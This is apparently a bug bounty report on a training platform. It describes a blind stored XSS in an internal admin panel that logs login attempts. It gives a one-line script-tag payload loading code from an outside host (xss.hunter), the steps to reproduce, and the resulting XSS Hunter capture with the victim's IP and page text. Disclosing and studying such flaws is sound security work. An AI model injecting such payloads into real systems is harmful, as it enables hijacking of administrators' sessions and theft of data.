FirstBlood-#1319 — Blind xss on FirstBloodHackers INTERNAL ADMIN PANEL
This issue was discovered on FirstBlood v3
On 2022-12-09, didsec Level 5 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
BugBountyHunter Membership
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hi there
I found that the internal admin page is vulnerable to a blind xss via login attempts on login.php
Payload
"><script src="https://xss.hunter"></script>
To reproduce :
- Go to the login page
- Enter payload in the username and password fields
- Click login
impact
An attacker is able to access critical information from the admin panel.
XSS Hunter report below
URL
The URL of the page the payload fired on.
`https://firstblood-helper.com/login_attempts.php?id=683`
---
IP Address
Remote IP address of the victim.
`86.145.182.70`
---
Referer
Referring page for the vulnerable page.
`https://firstblood-helper.com/login_attempts.php`
---
User-Agent
Web browser of the victim.
`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
---
Cookies
Non-HTTPOnly cookies of the victim.
_None_
---
Title
Vulnerable page's title.
`FirstBloodHackers INTERNAL ADMIN PANEL`
---
DOM/HTML
Rendered DOM of the vulnerable page.
#### Page HTML too large to display inline, please use one of the options below.
---
Text
Text of the vulnerable page.
1
Logged in as
2
ADMINISTRATOR-SEAN
3
4
Home
5
6
Login Attempts
7
8
INTERNAL USE ONLY
9
Managing FirstBlood Login Attempts
10
The login attempt below was flagged as being potentially malicious.
11
ID Username Date Actions
12
683 ">
---
Origin
HTTP origin of the vulnerable page.
`https://firstblood-helper.com`
---
Browser Time
Reported time according to the victim's browser.
`Friday, December 9th 2022, 10:38:55 am (_1670582335223_)`
---
Other
Other miscellaneous information.
Fired in iFrame?: `false`
Vulnerability enumerated `Friday, December 9th 2022, 10:38:57 am`
Report ID: `11b4d0bb-58d4-4a76-be70-8431fe4be1e0`
P1 CRITICAL
FirstBlood ID: 72
Vulnerability Type: Stored XSS
Login attempts were logged on an internal panel on firstblood-helper.com and the username is vulnerable to blind XSS affecting FirstBlood staff
Report Feedback
Creator & Administrator
CONGRATULATIONS, you were the first user to discover this bug based on login IDs. (although you were NOT the first to report it, I have concerns that some users modified earlier reports). You have won yourself a LIMITED edition BugBountyHunter HAT and a bounty. WELL DONE!!!